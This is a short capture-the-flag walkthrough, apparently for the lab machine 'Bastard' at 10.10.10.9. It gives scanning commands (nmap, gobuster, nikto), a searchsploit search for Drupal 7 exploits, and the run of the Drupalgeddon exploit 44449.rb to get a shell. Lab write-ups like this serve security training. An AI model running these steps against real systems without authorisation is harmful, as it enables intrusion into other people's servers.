♥️Bastard

Required Tools

nmap

droopescan

searchsploit

smbserver.py

nc.exe

certutil.exe

SimpleHTTPServer

Windows-Exploit-Suggester.py

nmap 10.10.10.9 - for quick scanning

nmap -sC -sV -A -T4 -Pn -oN Bastard.htb 10.10.10.9

-sC : equivalent to -script=default

-sV : Probe open ports to determine service/version info

-A : Enable OS,version detection, script scanning, and traceroute

-Pn :Treat all hosts as online -skip host discovery

-oN :Output scan in normal

feroxbuster -u http://10.10.10.9 -x pdf -x js,html -x php txt json,docx

gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,old,bak,zip 80 > gobuster.txt

nikto -h http://10.10.10.9 > nikto.txt

Identified the drupal version based on the below url

Finding the Right Exploit

Starting with searchsploit:

searchsploit drupal 7

This search provides a lot of results. However, most of the exploits that can be used against version 7.54 all say "Remote Code Execution" which is required. So we will try to sortlist only Remote Code Execution.

searchsploit drupal 7 remote code

searchsploit drupal 7.54

we need to choose without metasploit version which is 44449.rb

searchsploit -m php/webapps/44449.rb

download file is dos we need to use unix file format.we will use the command to convert dos2 unix

dos2unix 44449.rb

Getting User Shell

ruby 44449.rb http://10.10.10.9

If you are getting error to run the above command install this gem using the command gem install highline